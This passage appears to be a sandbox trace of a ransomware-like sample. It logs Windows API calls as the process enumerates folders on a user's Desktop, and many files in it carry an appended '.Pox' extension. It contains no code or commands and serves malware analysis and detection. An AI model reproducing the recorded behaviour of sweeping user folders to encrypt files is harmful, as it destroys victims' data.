ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x134b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENBmMMWK.bmp.Pox", cAlternateFileName="ENBMMM~1.POX")) returned 1 [0038.682] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4ddbec0, ftCreationTime.dwHighDateTime=0x1d4cc51, ftLastAccessTime.dwLowDateTime=0xf54fa3d0, ftLastAccessTime.dwHighDateTime=0x1d4d33d, ftLastWriteTime.dwLowDateTime=0x289701a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x0, dwReserved1=0x0, cFileName="gH-zamZAJg.mp3.Pox", cAlternateFileName="GH-ZAM~1.POX")) returned 1 [0038.683] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ee2d40, ftCreationTime.dwHighDateTime=0x1d4d1d7, ftLastAccessTime.dwLowDateTime=0xe528e990, ftLastAccessTime.dwHighDateTime=0x1d4d4e5, ftLastWriteTime.dwLowDateTime=0xe528e990, ftLastWriteTime.dwHighDateTime=0x1d4d4e5, nFileSizeHigh=0x0, nFileSizeLow=0x151ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="ICKBPik8.flv", cAlternateFileName="")) returned 1 [0038.683] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1ebac40, ftCreationTime.dwHighDateTime=0x1d4c9fe, ftLastAccessTime.dwLowDateTime=0x989a0550, ftLastAccessTime.dwHighDateTime=0x1d4cb2b, ftLastWriteTime.dwLowDateTime=0x289e25c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x16860, dwReserved0=0x0, dwReserved1=0x0, cFileName="m4SvX-jeGXwW.mkv.Pox", cAlternateFileName="M4SVX-~1.POX")) returned 1 [0038.683] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcddf5a90, ftCreationTime.dwHighDateTime=0x1d4ce8b, ftLastAccessTime.dwLowDateTime=0x5c6f7bf0, ftLastAccessTime.dwHighDateTime=0x1d4d3d2, ftLastWriteTime.dwLowDateTime=0x28a7ab40, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x6d40, dwReserved0=0x0, dwReserved1=0x0, cFileName="O0y0hsLAoKxoA.mp3.Pox", cAlternateFileName="O0Y0HS~1.POX")) returned 1 [0038.683] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a8281a0, ftCreationTime.dwHighDateTime=0x1d4d373, ftLastAccessTime.dwLowDateTime=0x95a18ea0, ftLastAccessTime.dwHighDateTime=0x1d4cd14, ftLastWriteTime.dwLowDateTime=0x95a18ea0, ftLastWriteTime.dwHighDateTime=0x1d4cd14, nFileSizeHigh=0x0, nFileSizeLow=0x16fab, dwReserved0=0x0, dwReserved1=0x0, cFileName="RQ9 -66bCRPg.odp", cAlternateFileName="RQ9-66~1.ODP")) returned 1 [0038.683] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24e9870, ftCreationTime.dwHighDateTime=0x1d4d2a5, ftLastAccessTime.dwLowDateTime=0x1bf10c20, ftLastAccessTime.dwHighDateTime=0x1d4d502, ftLastWriteTime.dwLowDateTime=0x28aa0ca0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x5ca0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sN3K33tDMKQaoIqJe.mp4.Pox", cAlternateFileName="SN3K33~1.POX")) returned 1 [0038.684] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x887d2840, ftCreationTime.dwHighDateTime=0x1d4d5a9, ftLastAccessTime.dwLowDateTime=0x24ca6ae0, ftLastAccessTime.dwHighDateTime=0x1d4c9c6, ftLastWriteTime.dwLowDateTime=0x24ca6ae0, ftLastWriteTime.dwHighDateTime=0x1d4c9c6, nFileSizeHigh=0x0, nFileSizeLow=0x87fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="sxImIod6M.m4a", cAlternateFileName="SXIMIO~1.M4A")) returned 1 [0038.684] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36868070, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x28d28400, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28d28400, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="T9ZgHii-", cAlternateFileName="")) returned 1 [0038.684] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55265fc0, ftCreationTime.dwHighDateTime=0x1d4c618, ftLastAccessTime.dwLowDateTime=0x28f175e0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28f175e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tQYzvy44", cAlternateFileName="")) returned 1 [0038.684] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaa03290, ftCreationTime.dwHighDateTime=0x1d4d118, ftLastAccessTime.dwLowDateTime=0x3abf6060, ftLastAccessTime.dwHighDateTime=0x1d4c69e, ftLastWriteTime.dwLowDateTime=0x28b39220, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x139e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wcRE.jpg.Pox", cAlternateFileName="WCREJP~1.POX")) returned 1 [0038.684] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d01ce90, ftCreationTime.dwHighDateTime=0x1d4d54b, ftLastAccessTime.dwLowDateTime=0x7107d870, ftLastAccessTime.dwHighDateTime=0x1d4d23b, ftLastWriteTime.dwLowDateTime=0x28b5f380, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="XRPTN7Kw.png.Pox", cAlternateFileName="XRPTN7~1.POX")) returned 1 [0038.684] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2d476b0, ftCreationTime.dwHighDateTime=0x1d4cc77, ftLastAccessTime.dwLowDateTime=0x17a50f70, ftLastAccessTime.dwHighDateTime=0x1d4c7ad, ftLastWriteTime.dwLowDateTime=0x28c69d20, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xaf80, dwReserved0=0x0, dwReserved1=0x0, cFileName="yjbKOP66PA6 t9xa78.bmp.Pox", cAlternateFileName="YJBKOP~1.POX")) returned 1 [0038.685] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d050ed0, ftCreationTime.dwHighDateTime=0x1d4c956, ftLastAccessTime.dwLowDateTime=0x28f638a0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28f638a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zh5KHKzPc6AOkC3JGPhN", cAlternateFileName="ZH5KHK~1")) returned 1 [0038.685] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa5d7a0, ftCreationTime.dwHighDateTime=0x1d4cabf, ftLastAccessTime.dwLowDateTime=0xe356290, ftLastAccessTime.dwHighDateTime=0x1d4c650, ftLastWriteTime.dwLowDateTime=0x28cb5fe0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x44b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZR4FkDMgSj24KiPo8.odt.Pox", cAlternateFileName="ZR4FKD~1.POX")) returned 1 [0038.685] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e75a920, ftCreationTime.dwHighDateTime=0x1d4cf39, ftLastAccessTime.dwLowDateTime=0x99ddca50, ftLastAccessTime.dwHighDateTime=0x1d4ce28, ftLastWriteTime.dwLowDateTime=0x99ddca50, ftLastWriteTime.dwHighDateTime=0x1d4ce28, nFileSizeHigh=0x0, nFileSizeLow=0x134df, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zu7U9XrkG49K.wav", cAlternateFileName="ZU7U9X~1.WAV")) returned 1 [0038.685] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e75a920, ftCreationTime.dwHighDateTime=0x1d4cf39, ftLastAccessTime.dwLowDateTime=0x99ddca50, ftLastAccessTime.dwHighDateTime=0x1d4ce28, ftLastWriteTime.dwLowDateTime=0x99ddca50, ftLastWriteTime.dwHighDateTime=0x1d4ce28, nFileSizeHigh=0x0, nFileSizeLow=0x134df, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zu7U9XrkG49K.wav", cAlternateFileName="ZU7U9X~1.WAV")) returned 0 [0038.685] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0038.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0038.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0038.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0038.686] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-", lpFilePart=0x0) returned 0x2e [0038.686] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\", lpFilePart=0x0) returned 0x2f [0038.686] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36868070, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x28d28400, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28d28400, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0038.686] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36868070, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x28d28400, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28d28400, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.686] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd183b50, ftCreationTime.dwHighDateTime=0x1d4ca85, ftLastAccessTime.dwLowDateTime=0xcc2df290, ftLastAccessTime.dwHighDateTime=0x1d4c69f, ftLastWriteTime.dwLowDateTime=0x28d022a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x17b30, dwReserved0=0x0, dwReserved1=0x0, cFileName="62iXFu5VPwWKjK9YrtO.avi.Pox", cAlternateFileName="62IXFU~1.POX")) returned 1 [0038.686] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cbcbcf0, ftCreationTime.dwHighDateTime=0x1d4ce25, ftLastAccessTime.dwLowDateTime=0xb013b20, ftLastAccessTime.dwHighDateTime=0x1d4cecb, ftLastWriteTime.dwLowDateTime=0xb013b20, ftLastWriteTime.dwHighDateTime=0x1d4cecb, nFileSizeHigh=0x0, nFileSizeLow=0x8593, dwReserved0=0x0, dwReserved1=0x0, cFileName="8ifNF.swf", cAlternateFileName="")) returned 1 [0038.686] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f82b2c0, ftCreationTime.dwHighDateTime=0x1d4ca10, ftLastAccessTime.dwLowDateTime=0x555a1930, ftLastAccessTime.dwHighDateTime=0x1d4ccd7, ftLastWriteTime.dwLowDateTime=0x555a1930, ftLastWriteTime.dwHighDateTime=0x1d4ccd7, nFileSizeHigh=0x0, nFileSizeLow=0x11c32, dwReserved0=0x0, dwReserved1=0x0, cFileName="F1tHsbysnX3JElKgeY.m4a", cAlternateFileName="F1THSB~1.M4A")) returned 1 [0038.687] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ca8a140, ftCreationTime.dwHighDateTime=0x1d4c562, ftLastAccessTime.dwLowDateTime=0x9f1d8a70, ftLastAccessTime.dwHighDateTime=0x1d4c6c4, ftLastWriteTime.dwLowDateTime=0x9f1d8a70, ftLastWriteTime.dwHighDateTime=0x1d4c6c4, nFileSizeHigh=0x0, nFileSizeLow=0x16862, dwReserved0=0x0, dwReserved1=0x0, cFileName="FGmRZRKbhxJ.wav", cAlternateFileName="FGMRZR~1.WAV")) returned 1 [0038.687] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a4f4c10, ftCreationTime.dwHighDateTime=0x1d4d00a, ftLastAccessTime.dwLowDateTime=0x6af891f0, ftLastAccessTime.dwHighDateTime=0x1d4d47e, ftLastWriteTime.dwLowDateTime=0x28d28400, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x56d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qumyxXz YiQpNxh4shD.xlsx.Pox", cAlternateFileName="QUMYXX~1.POX")) returned 1 [0038.687] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0038.687] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0038.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0038.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0038.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0038.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-", lpFilePart=0x0) returned 0x2e [0038.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\", lpFilePart=0x0) returned 0x2f [0038.687] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36868070, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x28d28400, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28d28400, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0038.687] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36868070, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x28d28400, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28d28400, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.688] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd183b50, ftCreationTime.dwHighDateTime=0x1d4ca85, ftLastAccessTime.dwLowDateTime=0xcc2df290, ftLastAccessTime.dwHighDateTime=0x1d4c69f, ftLastWriteTime.dwLowDateTime=0x28d022a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x17b30, dwReserved0=0x0, dwReserved1=0x0, cFileName="62iXFu5VPwWKjK9YrtO.avi.Pox", cAlternateFileName="62IXFU~1.POX")) returned 1 [0038.688] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cbcbcf0, ftCreationTime.dwHighDateTime=0x1d4ce25, ftLastAccessTime.dwLowDateTime=0xb013b20, ftLastAccessTime.dwHighDateTime=0x1d4cecb, ftLastWriteTime.dwLowDateTime=0xb013b20, ftLastWriteTime.dwHighDateTime=0x1d4cecb, nFileSizeHigh=0x0, nFileSizeLow=0x8593, dwReserved0=0x0, dwReserved1=0x0, cFileName="8ifNF.swf", cAlternateFileName="")) returned 1 [0038.688] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f82b2c0, ftCreationTime.dwHighDateTime=0x1d4ca10, ftLastAccessTime.dwLowDateTime=0x555a1930, ftLastAccessTime.dwHighDateTime=0x1d4ccd7, ftLastWriteTime.dwLowDateTime=0x555a1930, ftLastWriteTime.dwHighDateTime=0x1d4ccd7, nFileSizeHigh=0x0, nFileSizeLow=0x11c32, dwReserved0=0x0, dwReserved1=0x0, cFileName="F1tHsbysnX3JElKgeY.m4a", cAlternateFileName="F1THSB~1.M4A")) returned 1 [0038.688] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ca8a140, ftCreationTime.dwHighDateTime=0x1d4c562, ftLastAccessTime.dwLowDateTime=0x9f1d8a70, ftLastAccessTime.dwHighDateTime=0x1d4c6c4, ftLastWriteTime.dwLowDateTime=0x9f1d8a70, ftLastWriteTime.dwHighDateTime=0x1d4c6c4, nFileSizeHigh=0x0, nFileSizeLow=0x16862, dwReserved0=0x0, dwReserved1=0x0, cFileName="FGmRZRKbhxJ.wav", cAlternateFileName="FGMRZR~1.WAV")) returned 1 [0038.688] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a4f4c10, ftCreationTime.dwHighDateTime=0x1d4d00a, ftLastAccessTime.dwLowDateTime=0x6af891f0, ftLastAccessTime.dwHighDateTime=0x1d4d47e, ftLastWriteTime.dwLowDateTime=0x28d28400, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x56d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qumyxXz YiQpNxh4shD.xlsx.Pox", cAlternateFileName="QUMYXX~1.POX")) returned 1 [0038.688] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a4f4c10, ftCreationTime.dwHighDateTime=0x1d4d00a, ftLastAccessTime.dwLowDateTime=0x6af891f0, ftLastAccessTime.dwHighDateTime=0x1d4d47e, ftLastWriteTime.dwLowDateTime=0x28d28400, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x56d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qumyxXz YiQpNxh4shD.xlsx.Pox", cAlternateFileName="QUMYXX~1.POX")) returned 0 [0038.689] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0038.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0038.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0038.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0038.689] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44", lpFilePart=0x0) returned 0x2e [0038.689] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\", lpFilePart=0x0) returned 0x2f [0038.689] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55265fc0, ftCreationTime.dwHighDateTime=0x1d4c618, ftLastAccessTime.dwLowDateTime=0x28f175e0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28f175e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0038.689] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55265fc0, ftCreationTime.dwHighDateTime=0x1d4c618, ftLastAccessTime.dwLowDateTime=0x28f175e0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28f175e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.689] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3aa6920, ftCreationTime.dwHighDateTime=0x1d4c739, ftLastAccessTime.dwLowDateTime=0xbc163300, ftLastAccessTime.dwHighDateTime=0x1d4c874, ftLastWriteTime.dwLowDateTime=0xbc163300, ftLastWriteTime.dwHighDateTime=0x1d4c874, nFileSizeHigh=0x0, nFileSizeLow=0xa81a, dwReserved0=0x0, dwReserved1=0x0, cFileName="0b1kQACiak6.ots", cAlternateFileName="0B1KQA~1.OTS")) returned 1 [0038.689] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfba30340, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0xdcfd3420, ftLastAccessTime.dwHighDateTime=0x1d4d174, ftLastWriteTime.dwLowDateTime=0x28d746c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x1de0, dwReserved0=0x0, dwReserved1=0x0, cFileName="afnTu.mkv.Pox", cAlternateFileName="AFNTUM~1.POX")) returned 1 [0038.689] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x816b2d0, ftCreationTime.dwHighDateTime=0x1d4c55e, ftLastAccessTime.dwLowDateTime=0xb50f35e0, ftLastAccessTime.dwHighDateTime=0x1d4d295, ftLastWriteTime.dwLowDateTime=0x28e32da0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x16cd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GXNTB.jpg.Pox", cAlternateFileName="GXNTBJ~1.POX")) returned 1 [0038.690] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a13870, ftCreationTime.dwHighDateTime=0x1d4ceef, ftLastAccessTime.dwLowDateTime=0xc23210, ftLastAccessTime.dwHighDateTime=0x1d4c915, ftLastWriteTime.dwLowDateTime=0x28ea51c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x18e90, dwReserved0=0x0, dwReserved1=0x0, cFileName="kHfLoG p4e5.pdf.Pox", cAlternateFileName="KHFLOG~1.POX")) returned 1 [0038.690] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d417a0, ftCreationTime.dwHighDateTime=0x1d4c676, ftLastAccessTime.dwLowDateTime=0x2a3f27c0, ftLastAccessTime.dwHighDateTime=0x1d4d247, ftLastWriteTime.dwLowDateTime=0x28f175e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x15300, dwReserved0=0x0, dwReserved1=0x0, cFileName="pKpIeF7B-b-a.csv.Pox", cAlternateFileName="PKPIEF~1.POX")) returned 1 [0038.690] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, 